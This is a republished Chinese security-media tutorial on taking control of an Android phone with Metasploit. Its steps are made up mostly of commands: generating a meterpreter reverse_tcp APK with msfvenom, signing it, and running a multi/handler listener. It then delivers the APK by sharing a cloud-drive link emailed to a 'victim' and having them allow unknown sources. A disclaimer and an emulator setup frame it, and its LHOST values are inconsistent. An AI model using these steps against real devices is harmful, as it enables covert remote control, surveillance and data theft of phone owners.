如何使用Metasploit对安卓手机进行控制

文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。

在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机:Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk

p 设置要使用的payload LHOST 设置用来接收反弹连接的主机 LPORT 设置用来接收反弹连接的端口 R 设置文件格式 Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名:

l Keytool (已安装) l jar signer (已安装) l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

`

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

`

Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK,它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handlerSet PAYLOAD android/meterpreter/reverse_tcpSET LHOST 192.168.152.128SET LPORT 4444Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

这是我们切换到安卓模拟器。

1、从https://code.google.com/archive/p/android-x86/downloads下载android x86的iso。2、使用vmware创建一个内核版本为2.6的虚拟机。3、挂载镜像,启动虚拟机。4、进入Live模式。5、设置手机并登陆谷歌帐号。

在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。

另外要允许安卓安装来历不明的apk。

切换回Kali,我们发现创建了一个新的会话。

然后你就可以为所欲为的操作这台“手机”了。

*参考来源:resources.infosecinstitute ,FB小编东二门陈冠希编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2016-05-16

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏张戈的专栏

自动管理员身份执行小工具—asroot

推荐使用的典型环境: 用户为普通帐号,没有管理员权限,但又必须取得程序安装权限,比如产线作业员需要时常更新驱动: 为了安全而使用普通帐号的个人电脑 还记得记得以...

3659
来自专栏FreeBuf

小心Windows旧版认证暴露你的系统帐户密码

当你正用浏览器访问网站时,Windows的一个古老漏洞就可能泄露了你电脑的用户名密码、微软登录信息,甚至还有你VPN的账号密码。 多年以前当Windows还在使...

23510
来自专栏FreeBuf

史上最全的njRAT通信协议分析

*本文原创作者:菠菜,本文属FreeBuf原创奖励计划,未经许可禁止转载 Njrat,又称Bladabindi,该木马家族使用.NET框架编写,是一个典型的RA...

2606
来自专栏FreeBuf

Metasploitable2使用指南

Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版...

4769
来自专栏数据之美

记一次诡异的 ssh 互信免密码登录失败

背景 因为 hadoop 环境需要 master 能免密码 ssh localhost,所以我们需要建立与本机 localhost 的互信,方法很简单: 1. ...

3745
来自专栏Seebug漏洞平台

Microsoft Azure 以太坊节点自动化部署方案漏洞分析

作者:sunsama@知道创宇404区块链安全研究团队 时间:2018/07/10

1021
来自专栏三木的博客

使用gerrit作为代码评审工具

需求描述 其实作为项目代码的maintainer,一直习惯于mailing list + git的代码评审及管理,无奈公司主推敏捷+devops,老板让改用ge...

3226
来自专栏区块链入门

第4课 如何在UBUNTU虚拟机上编译EOS完成环境搭建?

【本文目标】 通过本文实践,能在WINDOWS操作系统搭建UBUNTU 18.04 LTS环境,并在此环境编译成功EOS v1.0.5正式发布版本。 【前置...

3075
来自专栏java学习

【干货来了】!Oracle及普通软件卸载详解!

电脑用的久了,里面的软件安装也会越来越多,但总有一些软件在使用过程中,甚至我们安装的过程中出现或多或少的问题,导致我们总是装了卸,卸了装(老实说,有时候纠结症都...

1371
来自专栏Android开发实战

Gradle for Android简要指南

前言 Android官网构建系统介绍https://developer.android.com/studio/build/index.html

1032

扫码关注云+社区

领取腾讯云代金券